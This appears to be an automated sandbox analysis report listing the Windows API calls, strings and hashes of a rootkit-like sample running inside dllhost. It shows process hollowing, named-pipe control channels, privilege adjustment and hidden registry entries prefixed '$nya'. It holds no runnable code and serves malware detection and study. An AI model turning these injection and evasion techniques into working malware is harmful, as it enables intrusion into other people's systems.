Part of subcall function 0000000140001868: NtQueryInformationProcess.NTDLL ref: 0000000140001A1B
Part of subcall function 0000000140001868: OpenProcessToken.ADVAPI32 ref: 0000000140001A43
Part of subcall function 0000000140001868: GetTokenInformation.KERNELBASE ref: 0000000140001A6F
Part of subcall function 0000000140001868: GetLastError.KERNEL32 ref: 0000000140001A79
Part of subcall function 0000000140001868: LocalAlloc.KERNEL32 ref: 0000000140001A8C
Part of subcall function 0000000140001868: GetTokenInformation.KERNELBASE ref: 0000000140001AB8
Part of subcall function 0000000140001868: GetSidSubAuthorityCount.ADVAPI32 ref: 0000000140001AC5
Part of subcall function 0000000140001868: GetSidSubAuthority.ADVAPI32 ref: 0000000140001AD4
Part of subcall function 0000000140001868: LocalFree.KERNEL32 ref: 0000000140001AEC
Part of subcall function 0000000140001868: CloseHandle.KERNEL32 ref: 0000000140001B00
Part of subcall function 0000000140001868: StrStrA.SHLWAPI ref: 0000000140001BAB

ReadFile.KERNEL32 ref: 00000001400032DE
ExitProcess.KERNEL32 ref: 000000014000334E
ReadFile.KERNELBASE ref: 0000000140003371
GetProcessHeap.KERNEL32 ref: 0000000140003392
HeapAlloc.KERNEL32 ref: 00000001400033A3
GetProcessHeap.KERNEL32 ref: 00000001400033FA
HeapFree.KERNEL32 ref: 0000000140003408
RegOpenKeyExW.ADVAPI32 ref: 000000014000346F
RegDeleteValueW.ADVAPI32 ref: 0000000140003487
RegDeleteValueW.ADVAPI32 ref: 000000014000349B
RegDeleteValueW.ADVAPI32 ref: 00000001400034AF

Strings

SOFTWARE, xrefs: 0000000140003461
open, xrefs: 0000000140003608
$nya-svc64, xrefs: 00000001400034C1
$nya-dll32, xrefs: 0000000140003494
$nya-stager, xrefs: 0000000140003480
$nya-dll64, xrefs: 00000001400034A8
$nya-svc32, xrefs: 00000001400034B5

Memory Dump Source

Source File: 00000007.00000002.1741826799.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.1741741840.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.1741912250.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.1741996041.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd

Similarity

API ID: Process$Heap$Open$File$AllocCloseDeleteHandleInformationTokenValue$AuthorityFreeLocalNameRead$CountEnumErrorExitFindLastModulePathProcessesQueryWow64lstrlen
String ID: $nya-dll32$$nya-dll64$$nya-stager$$nya-svc32$$nya-svc64$SOFTWARE$open
API String ID: 2078740077-1712970621
Opcode ID: f7c68859b52914e3334372da6bae20eccf7175c030ed6d90c0cd16e79758e7fd
Instruction ID: c8d4f342e40e6777a9670b8351b23a9f9beb54452381f7607bad1af34793ce04
Opcode Fuzzy Hash: f7c68859b52914e3334372da6bae20eccf7175c030ed6d90c0cd16e79758e7fd
Instruction Fuzzy Hash: 0FB106F120468196EB7BDF27B8543E922A9F74C7C4F448125BB0A47ABADF39C645C704

Function 0000000140001CF0 Relevance: 19.6, APIs: 13, Instructions: 131
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 0000000140001D23
HeapAlloc.KERNEL32 ref: 0000000140001D36
GetProcessHeap.KERNEL32 ref: 0000000140001D44
HeapAlloc.KERNEL32 ref: 0000000140001D55
K32EnumProcesses.KERNEL32 ref: 0000000140001D6F
OpenProcess.KERNEL32 ref: 0000000140001D9D
K32EnumProcessModulesEx.KERNEL32 ref: 0000000140001DCA
ReadProcessMemory.KERNEL32 ref: 0000000140001E01
CloseHandle.KERNELBASE ref: 0000000140001E46
GetProcessHeap.KERNEL32 ref: 0000000140001E58
RtlFreeHeap.NTDLL ref: 0000000140001E66
GetProcessHeap.KERNEL32 ref: 0000000140001E6C
RtlFreeHeap.NTDLL ref: 0000000140001E7A

Memory Dump Source

Source File: 00000007.00000002.1741826799.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.1741741840.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.1741912250.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.1741996041.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
String ID:
API String ID: 4084875642-0
Opcode ID: f02ff77e7f4e077cdd12b46490152bc7a80db30c6c4fa853e392340b29967d71
Instruction ID: e2e15449054ed3f9ee7818d53de513bd52f9f3644679b514a33cb2e068489f8a
Opcode Fuzzy Hash: f02ff77e7f4e077cdd12b46490152bc7a80db30c6c4fa853e392340b29967d71
Instruction Fuzzy Hash: 1B5158B2711A808AEB66DF63F8587EA22A1F78DBC4F804025EF595B764DF38C585C700

Function 0000000140002300 Relevance: 9.1, APIs: 6, Instructions: 82
memorypipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AllocateAndInitializeSid.ADVAPI32 ref: 000000014000234F
SetEntriesInAclW.ADVAPI32 ref: 0000000140002397
LocalAlloc.KERNEL32 ref: 00000001400023A7
InitializeSecurityDescriptor.ADVAPI32 ref: 00000001400023BB
SetSecurityDescriptorDacl.ADVAPI32 ref: 00000001400023D2
CreateNamedPipeW.KERNELBASE ref: 0000000140002413

Memory Dump Source

Source File: 00000007.00000002.1741826799.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.1741741840.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.1741912250.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.1741996041.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd

Similarity

API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
String ID:
API String ID: 3197395349-0
Opcode ID: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
Instruction ID: 08f0d969cdc459eeaae67e0f3491139f795acf93ec6e34b01acc3ed94c40f622
Opcode Fuzzy Hash: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
Instruction Fuzzy Hash: 173169B2214691CAE761CF25F4807DE77A4F748798F40422AFB4947EA8DB78C259CB44

Function 0000000140002A0C Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 124
filememorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCpyW.SHLWAPI ref: 0000000140002A3D
StrCatW.SHLWAPI ref: 0000000140002A4B
GetModuleHandleW.KERNEL32 ref: 0000000140002A54
GetCurrentProcess.KERNEL32 ref: 0000000140002A74
K32GetModuleInformation.KERNEL32 ref: 0000000140002A88
CreateFileW.KERNELBASE ref: 0000000140002AB8
CreateFileMappingW.KERNELBASE ref: 0000000140002AE2
MapViewOfFile.KERNELBASE ref: 0000000140002B05
lstrcmpiA.KERNEL32 ref: 0000000140002B5B
VirtualProtect.KERNEL32 ref: 0000000140002B8E
VirtualProtect.KERNEL32 ref: 0000000140002BBE
CloseHandle.KERNELBASE ref: 0000000140002BC7
CloseHandle.KERNEL32 ref: 0000000140002BD0
FreeLibrary.KERNEL32 ref: 0000000140002BD9

Strings

.text, xrefs: 0000000140002B54
C:\Windows\System32\, xrefs: 0000000140002A2F

Memory Dump Source

Source File: 00000007.00000002.1741826799.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.1741741840.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.1741912250.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.1741996041.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd

Similarity

API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
String ID: .text$C:\Windows\System32\
API String ID: 2721474350-832442975
Opcode ID: c686aa51e377184264062a0a3ec39641cbabcbb6b6338b4f9c9e14a722750aea
Instruction ID: 2da0f49b8f504828cf99bd1c35657877bba6dbaefb57c64c0b3462adf03dc19e
Opcode Fuzzy Hash: c686aa51e377184264062a0a3ec39641cbabcbb6b6338b4f9c9e14a722750aea
Instruction Fuzzy Hash: 59517BB230468086EB62DF16F9587DA73A1FB8CBD5F444625AF4A03BA8DF38C548C704

Function 00000001400036F4 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40
sleepfilepipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000000140002300: AllocateAndInitializeSid.ADVAPI32 ref: 000000014000234F
Part of subcall function 0000000140002300: SetEntriesInAclW.ADVAPI32 ref: 0000000140002397
Part of subcall function 0000000140002300: LocalAlloc.KERNEL32 ref: 00000001400023A7
Part of subcall function 0000000140002300: InitializeSecurityDescriptor.ADVAPI32 ref: 00000001400023BB
Part of subcall function 0000000140002300: SetSecurityDescriptorDacl.ADVAPI32 ref: 00000001400023D2
Part of subcall function 0000000140002300: CreateNamedPipeW.KERNELBASE ref: 0000000140002413

Sleep.KERNEL32 ref: 0000000140003719
ConnectNamedPipe.KERNELBASE ref: 0000000140003726
ReadFile.KERNEL32 ref: 0000000140003749
WriteFile.KERNEL32 ref: 0000000140003777
Sleep.KERNEL32 ref: 0000000140003784
DisconnectNamedPipe.KERNEL32 ref: 000000014000378D

Strings

M, xrefs: 000000014000376A
\\.\pipe\$nya-childproc, xrefs: 0000000140003701

Memory Dump Source

Source File: 00000007.00000002.1741826799.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.1741741840.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.1741912250.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.1741996041.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd

Similarity

API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
String ID: M$\\.\pipe\$nya-childproc
API String ID: 2203880229-802795868
Opcode ID: a9b0775309c1033bdde321130d9dbfa8a5fd9d512a1023e9268893db04bfe7f9
Instruction ID: 5f21e6060fcfdf5e456d3793ca8ca668dea709d71954cc69c9167fab55033164
Opcode Fuzzy Hash: a9b0775309c1033bdde321130d9dbfa8a5fd9d512a1023e9268893db04bfe7f9
Instruction Fuzzy Hash: 0E1179F1208A4082E726EB22F8147EA6760E78DBE0F444225FB5A036F5CF7CC548CB00

Function 0000000140002CB0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36
sleeppipefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000000140002300: AllocateAndInitializeSid.ADVAPI32 ref: 000000014000234F
Part of subcall function 0000000140002300: SetEntriesInAclW.ADVAPI32 ref: 0000000140002397
Part of subcall function 0000000140002300: LocalAlloc.KERNEL32 ref: 00000001400023A7
Part of subcall function 0000000140002300: InitializeSecurityDescriptor.ADVAPI32 ref: 00000001400023BB
Part of subcall function 0000000140002300: SetSecurityDescriptorDacl.ADVAPI32 ref: 00000001400023D2
Part of subcall function 0000000140002300: CreateNamedPipeW.KERNELBASE ref: 0000000140002413

Sleep.KERNEL32 ref: 0000000140002CD5
ConnectNamedPipe.KERNELBASE ref: 0000000140002CE2
ReadFile.KERNELBASE ref: 0000000140002D05
Sleep.KERNEL32 ref: 0000000140002D26
DisconnectNamedPipe.KERNELBASE ref: 0000000140002D2F

Strings

\\.\pipe\$nya-control, xrefs: 0000000140002CBD

Memory Dump Source

Source File: 00000007.00000002.1741826799.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.1741741840.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.1741912250.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.1741996041.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd

Similarity

API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
String ID: \\.\pipe\$nya-control
API String ID: 2071455217-2728758917
Opcode ID: ea5d0e36b259e0d9586660e08200355551478b737e680bb1466d0a5669cd7301
Instruction ID: fae886f8300dcbc0ba88151123110c58f904b6dff6578ae57d5354566521a009
Opcode Fuzzy Hash: ea5d0e36b259e0d9586660e08200355551478b737e680bb1466d0a5669cd7301
Instruction Fuzzy Hash: 6F011AB1214A0482FB16EB23F8547E9A360A79DBE1F154225FB67436F5DF78C888C704

Function 0000000140003634 Relevance: 9.1, APIs: 6, Instructions: 58
memorysleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000000014000364F
HeapAlloc.KERNEL32 ref: 0000000140003663
GetProcessHeap.KERNEL32 ref: 000000014000366C
HeapAlloc.KERNEL32 ref: 000000014000367A
K32EnumProcesses.KERNEL32 ref: 0000000140003695
Sleep.KERNEL32 ref: 00000001400036EA

Memory Dump Source

Source File: 00000007.00000002.1741826799.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.1741741840.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.1741912250.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.1741996041.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd

Similarity

API ID: Heap$AllocProcess$EnumProcessesSleep
String ID:
API String ID: 3676546796-0
Opcode ID: 81151b99d530d65dfa122e6c8ce9ef601985b82c456e08e1a9a7be0ad97868de
Instruction ID: a1b66254d96c7cf11d413aba10b9c6aee428658a90ca8d6027ab0afa1d9e2250
Opcode Fuzzy Hash: 81151b99d530d65dfa122e6c8ce9ef601985b82c456e08e1a9a7be0ad97868de
Instruction Fuzzy Hash: 2C1160B270065196E716DB17F81475A7AA6F789BC1F558128EF4207B78CF3AD884CB40

Function 000000014000200C Relevance: 9.1, APIs: 6, Instructions: 55
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(?,?,00000000,0000000140002F50), ref: 0000000140002021
HeapAlloc.KERNEL32(?,?,00000000,0000000140002F50), ref: 0000000140002032

Part of subcall function 0000000140001CF0: GetProcessHeap.KERNEL32 ref: 0000000140001D23
Part of subcall function 0000000140001CF0: HeapAlloc.KERNEL32 ref: 0000000140001D36
Part of subcall function 0000000140001CF0: GetProcessHeap.KERNEL32 ref: 0000000140001D44
Part of subcall function 0000000140001CF0: HeapAlloc.KERNEL32 ref: 0000000140001D55
Part of subcall function 0000000140001CF0: K32EnumProcesses.KERNEL32 ref: 0000000140001D6F
Part of subcall function 0000000140001CF0: OpenProcess.KERNEL32 ref: 0000000140001D9D
Part of subcall function 0000000140001CF0: K32EnumProcessModulesEx.KERNEL32 ref: 0000000140001DCA
Part of subcall function 0000000140001CF0: ReadProcessMemory.KERNEL32 ref: 0000000140001E01
Part of subcall function 0000000140001CF0: CloseHandle.KERNELBASE ref: 0000000140001E46
Part of subcall function 0000000140001CF0: GetProcessHeap.KERNEL32 ref: 0000000140001E58
Part of subcall function 0000000140001CF0: RtlFreeHeap.NTDLL ref: 0000000140001E66
Part of subcall function 0000000140001CF0: GetProcessHeap.KERNEL32 ref: 0000000140001E6C
Part of subcall function 0000000140001CF0: RtlFreeHeap.NTDLL ref: 0000000140001E7A

OpenProcess.KERNEL32 ref: 0000000140002079
TerminateProcess.KERNEL32 ref: 000000014000208C
CloseHandle.KERNEL32 ref: 0000000140002095
GetProcessHeap.KERNEL32 ref: 00000001400020A5

Memory Dump Source

Source File: 00000007.00000002.1741826799.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.1741741840.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.1741912250.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.1741996041.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd

Similarity

API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
String ID:
API String ID: 1323846700-0
Opcode ID: 9e888eed53e2bb10b5f797a2cff84821bb432324b3c6bbcbdbea6ae691bf0545
Instruction ID: 146a1b11f62a0205da1b5a2207c4e551d66db48d886c31f99c97199126aec534
Opcode Fuzzy Hash: 9e888eed53e2bb10b5f797a2cff84821bb432324b3c6bbcbdbea6ae691bf0545
Instruction Fuzzy Hash: 77114CB1B0564086FB16DF27B84439A66A1AB8DBD4F488028FF0903776EE39C4868704

Function 0000000140002D38 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000000140002D4C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D74
Part of subcall function 0000000140002D4C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D84
Part of subcall function 0000000140002D4C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D9E
Part of subcall function 0000000140002D4C: LookupPrivilegeValueW.ADVAPI32 ref: 0000000140002DB5
Part of subcall function 0000000140002D4C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002DED
Part of subcall function 0000000140002D4C: GetLastError.KERNEL32 ref: 0000000140002DF7
Part of subcall function 0000000140002D4C: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E00
Part of subcall function 0000000140002D4C: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E29
Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E59
Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E89
Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E9D
Part of subcall function 0000000140002D4C: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EAB
Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EBE
Part of subcall function 0000000140002D4C: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002ECC

ExitProcess.KERNEL32 ref: 0000000140002D43

Memory Dump Source

Source File: 00000007.00000002.1741826799.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.1741741840.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.1741912250.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.1741996041.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd

Similarity

API ID: Process$Heap$OpenValue$AllocQueryToken$AdjustCloseCurrentErrorExitHandleLastLookupPrivilegePrivileges
String ID:
API String ID: 2472495637-0
Opcode ID: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
Instruction ID: 466ff6e6ce30b805044d1f2dc35dca8baccd3c328fc793c3ea1e6e53ebee4899
Opcode Fuzzy Hash: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
Instruction Fuzzy Hash: 15A002F0F2258083EB0AB7B7B85A3DD25B1ABAC781F100416B2024B2B3DE3C48954759

Non-executed Functions

Function 0000000140002434 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 317
injectionthreadmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNEL32 ref: 000000014000252A
VirtualAllocEx.KERNEL32 ref: 0000000140002581
WriteProcessMemory.KERNEL32 ref: 00000001400025A9
VirtualProtectEx.KERNEL32 ref: 00000001400025D4
WriteProcessMemory.KERNEL32 ref: 0000000140002613
VirtualProtectEx.KERNEL32 ref: 000000014000265D
VirtualAlloc.KERNEL32 ref: 0000000140002693
GetThreadContext.KERNEL32 ref: 00000001400026B6
WriteProcessMemory.KERNEL32 ref: 00000001400026E1
SetThreadContext.KERNEL32 ref: 0000000140002704
ResumeThread.KERNEL32 ref: 0000000140002717
VirtualAllocEx.KERNEL32 ref: 0000000140002759
WriteProcessMemory.KERNEL32 ref: 0000000140002781
VirtualProtectEx.KERNEL32 ref: 00000001400027AB
WriteProcessMemory.KERNEL32 ref: 00000001400027EA
VirtualProtectEx.KERNEL32 ref: 0000000140002834
VirtualAlloc.KERNEL32 ref: 0000000140002869
Wow64GetThreadContext.KERNEL32 ref: 0000000140002887
WriteProcessMemory.KERNEL32 ref: 00000001400028AC
Wow64SetThreadContext.KERNEL32 ref: 00000001400028CA
OpenProcess.KERNEL32 ref: 00000001400028E6
TerminateProcess.KERNEL32 ref: 00000001400028F6

Part of subcall function 00000001400020CC: GetModuleHandleA.KERNEL32(?,?,00000000,0000000140002C18), ref: 00000001400020DC
Part of subcall function 00000001400020CC: GetProcAddress.KERNEL32(?,?,00000000,0000000140002C18), ref: 00000001400020EF

Strings

RtlGetVersion, xrefs: 000000014000249B
h, xrefs: 00000001400024EE
@, xrefs: 0000000140002751
NtUnmapViewOfSection, xrefs: 000000014000253C

Memory Dump Source

Source File: 00000007.00000002.1741826799.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.1741741840.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.1741912250.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.1741996041.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd

Similarity

API ID: Process$Virtual$MemoryWrite$Thread$AllocContextProtect$Wow64$AddressCreateHandleModuleOpenProcResumeTerminate
String ID: @$NtUnmapViewOfSection$RtlGetVersion$h
API String ID: 1036100660-1371749706
Opcode ID: 062723520bc959b99614c26b60837a5fa848bce833f489094e5110284047cdb9
Instruction ID: fe181f3da7762b1cf8407140d3e190fa013b7b60483d6e0a4c0671c43d788581
Opcode Fuzzy Hash: 062723520bc959b99614c26b60837a5fa848bce833f489094e5110284047cdb9
Instruction Fuzzy Hash: ACD16FB270568187EB65CF63F84479AB7A0F788BC4F044025EB8A47BA4DF78D599CB04

Function 0000000140001274 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 136
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000001400012D1
GetProcessHeap.KERNEL32 ref: 00000001400012DF
HeapAlloc.KERNEL32 ref: 00000001400012F0
RegEnumValueW.ADVAPI32 ref: 000000014000134F
StrCmpIW.SHLWAPI ref: 0000000140001388
StrCmpW.SHLWAPI ref: 0000000140001390
GetProcessHeap.KERNEL32 ref: 00000001400013C7
HeapAlloc.KERNEL32 ref: 00000001400013D5
GetProcessHeap.KERNEL32 ref: 00000001400013F2
HeapFree.KERNEL32 ref: 0000000140001400
lstrlenW.KERNEL32 ref: 0000000140001409
GetProcessHeap.KERNEL32 ref: 0000000140001417
HeapAlloc.KERNEL32 ref: 0000000140001425
StrCpyW.SHLWAPI ref: 0000000140001447
GetProcessHeap.KERNEL32 ref: 000000014000145E
HeapFree.KERNEL32 ref: 000000014000146C

Strings

d, xrefs: 0000000140001312

Memory Dump Source

Source File: 00000007.00000002.1741826799.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.1741741840.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.1741912250.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.1741996041.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 3db9478a101194b55b940351d2e6744c1199954fa76c07e8abb2f2f05a3be27a
Instruction ID: cbe0a9e96035c6652df35f1bebe582e7c0167c489293dce8c24ece8bd57d0938
Opcode Fuzzy Hash: 3db9478a101194b55b940351d2e6744c1199954fa76c07e8abb2f2f05a3be27a
Instruction Fuzzy Hash: C35128B2604B8486EB56DF62F4483AA77A1F78CBD5F444124EB4A07B79DF38C555C700

Function 000000014000217C Relevance: 13.6, APIs: 9, Instructions: 100memorycomCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 0000000140002192
SysAllocString.OLEAUT32 ref: 00000001400021A2
CoInitializeEx.OLE32 ref: 00000001400021AF
CoInitializeSecurity.OLE32 ref: 00000001400021E6
CoCreateInstance.OLE32 ref: 0000000140002226
VariantInit.OLEAUT32 ref: 0000000140002238
CoUninitialize.OLE32 ref: 00000001400022D2
SysFreeString.OLEAUT32 ref: 00000001400022DB
SysFreeString.OLEAUT32 ref: 00000001400022E4

Memory Dump Source

Source File: 00000007.00000002.1741826799.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.1741741840.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.1741912250.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.1741996041.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd

Similarity

API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
String ID:
API String ID: 4184240511-0
Opcode ID: 84ff88ccb10f49b49e4af97301c9a9495f723d3e4f2f51ef83b7847e1ee965a3
Instruction ID: 0e6833bd3eeca7de3220de005558475a35c56d9be5ad7e086776b2a4e8a7938b
Opcode Fuzzy Hash: 84ff88ccb10f49b49e4af97301c9a9495f723d3e4f2f51ef83b7847e1ee965a3
Instruction Fuzzy Hash: 894147B2700A859AE711CF6AE8843DD73B1FB89B89F445225FF0A43A69DF38C159C304

Function 000000014000151C Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 0000000140001527
HeapAlloc.KERNEL32 ref: 0000000140001536

Part of subcall function 0000000140001220: GetProcessHeap.KERNEL32(?,?,00000000,0000000140001544), ref: 0000000140001226
Part of subcall function 0000000140001220: HeapAlloc.KERNEL32(?,?,00000000,0000000140001544), ref: 0000000140001235
Part of subcall function 0000000140001220: GetProcessHeap.KERNEL32(?,?,00000000,0000000140001544), ref: 000000014000124F
Part of subcall function 0000000140001220: HeapAlloc.KERNEL32(?,?,00000000,0000000140001544), ref: 0000000140001260

Part of subcall function 0000000140001000: GetProcessHeap.KERNEL32(?,?,00000000,000000014000154C), ref: 0000000140001006
Part of subcall function 0000000140001000: HeapAlloc.KERNEL32(?,?,00000000,000000014000154C), ref: 0000000140001015
Part of subcall function 0000000140001000: GetProcessHeap.KERNEL32(?,?,00000000,000000014000154C), ref: 0000000140001028
Part of subcall function 0000000140001000: HeapAlloc.KERNEL32(?,?,00000000,000000014000154C), ref: 0000000140001037

RegOpenKeyExW.ADVAPI32 ref: 00000001400015A6
RegOpenKeyExW.ADVAPI32 ref: 00000001400015D3
RegCloseKey.ADVAPI32 ref: 00000001400015ED
RegOpenKeyExW.ADVAPI32 ref: 000000014000160D
RegCloseKey.ADVAPI32 ref: 0000000140001628
RegOpenKeyExW.ADVAPI32 ref: 0000000140001648
RegCloseKey.ADVAPI32 ref: 0000000140001663
RegOpenKeyExW.ADVAPI32 ref: 0000000140001683
RegCloseKey.ADVAPI32 ref: 000000014000169E
RegOpenKeyExW.ADVAPI32 ref: 00000001400016BE
RegCloseKey.ADVAPI32 ref: 00000001400016D9
